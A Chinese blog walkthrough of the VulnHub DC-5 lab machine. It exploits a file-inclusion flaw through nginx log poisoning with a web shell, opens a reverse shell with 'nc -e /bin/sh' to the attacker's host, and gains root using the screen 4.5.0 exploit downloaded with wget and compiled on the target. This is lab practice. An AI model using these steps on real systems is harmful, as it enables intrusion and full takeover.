靶机15 DC---5(最简单的方法)

已于 2023-11-10 15:40:43 修改
阅读量123 收藏 1
点赞数
分类专栏: dc--系列 靶机 文章标签: 网络
于 2023-11-04 15:37:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134214810
版权

 DC---5

1.信息收集

1.arp寻找IP

sudo arp-scan -l

2.nmap扫描端口.

nmap 192.168.221.134

3.发现rpcbind,详细扫描

4.查看80端口

5.扫描目录

dirsearch --url http://192.168.221.134

6.查看/thankyou.php发现新页面

2.验证漏洞

1.留言版的日期也是会变,thankyou.php包含了footer.php页面

这是不是有可能存在文件包含漏洞

2.尝试一下是否存在文件包含漏洞

file=/etc/passwd

3.发现存在文件包含

查看passwd的文件,但是没有可以登录的

使用burp抓包修改数据

3.上传一句话木马

4.上传成功

因为执行的内容会被日志记录下来,通过Wappalyzer查看到了是nginx1.6.2版本的

它的日志会记录在/var/log/nginx/error.log

/thankyou.php?file=/var/log/nginx/error.log

中国蚁剑连接

地址:http://192.168.221.134/thankyou.php?file=/var/log/nginx/error.log

密码:demon

3.进行反弹shell

1.进入命令终端,

kali:

nc -lvvp 4444

baji:

nc 192.168.221.128 4444 -e /bin/sh

连接成功

4.提权(不看,去看最后直接真实。)

1.使用SUID提权

exim4走不了

2.查看screen-4.5.0漏洞

searchsploit screen 4.5.0

3.下载41154.sh漏洞

searchsploit -m 41154.sh

以下全是网上的(不用,太麻烦)

4.查看使用方法

cat 41154.sh

5.使用漏洞

按照脚本提示,先将第一部分内容写到libhax.c中(一共有三个部分)

1.创建一个文件加

2.创建libhax.c

3.创建rootshell.c

4.创建dc5.sh

5.开启一个端口

python3 -m http.server 8888

6.靶机上下载这三个文件,记得去tmp目录下

1.下载libhax.c

wget http://192.168.221.128:8888/libhax.c

chmod +777 libhax.c

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

2.下载rootshell.c

wget http://192.168.221.128:8888/rootshell.c

chmod +777 rootshell.c

gcc -o /tmp/rootshell /tmp/rootshell.c

3.下载dc5.sh

wget http://192.168.221.128:8888/dc5.sh

chmod +777 dc5.sh


4.执行

./dc5.sh

./rootshell

5.成功

下载漏洞。直接真实。

wj33333
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5637
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
DC-5靶机渗透测试
读书 买花 长大
03-14 1477
DC-5
DC-5靶机渗透测试过程(个人学习)
最新发布
m0_59028058的博客
05-27 1895
访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞。它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log。访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传。直接在url后面输入
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2395
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
看完这篇 教你玩转渗透测试靶机vulnhub——DC5
Aluxian_的博客
03-25 6405
Vulnhub靶机DC5渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:文件包含: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC5,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址: https://download.vulnhub.co
DC-5靶机
mlws1900的博客
03-25 742
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC系列05】DC-5靶机复盘
weixin_44681307的博客
07-09 132
利用中国蚁剑登陆一下这个shell,我们进行一个nc反弹shell到我们的kali中,蚁剑的是虚拟终端,不是真正的终端,提权不会成功。用bp抓一下包,get一段木马代码,再查看这个日志文件时候发现xxx还在,但是php代码不见了,说明代码被成功执行了。提交后就进入这个页面了,当我们每次刷新时候会发现下面的年份是会变化的,所以猜测这个网页肯定有一个文件包含漏洞。搜索一下有root权限的文件,发现有一个screen=4.5.0,我们去搜索一下这个有没有漏洞。发现有两个可以利用的漏洞文件。
Vulnhub靶机渗透学习——DC-5
qq_45612828的博客
10-21 134
wfuzz 文件包含参数文件包含 nginx 日志文件 getshell 方式screen4.5.0 版本进行提权操作。
DC-5靶机渗透
weixin_45349299的博客
02-13 192
kali攻击机:192.168.235.130。
vulnhub之DC5靶机
LainWith的博客
08-15 594
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
DC-5渗透测试教程详解
城下深蓝的博客
02-19 1041
DC-5渗透测试教程详解
vuInhub靶场实战系列-DC-5实战
weixin_45221204的博客
05-26 1242
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-5靶机渗透测试,内容包括 nmap扫描、dirsearch目录扫描、文件包含、Burp Suite密码爆破、netcat反弹shell、rpcbind漏洞利用、GNU Screen漏洞利用、sudo提权等内容。
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5925
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Vulnhub-DC-5靶机实战
御七彩虹猫
05-18 866
Vulnhub-DC-5靶机实战
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值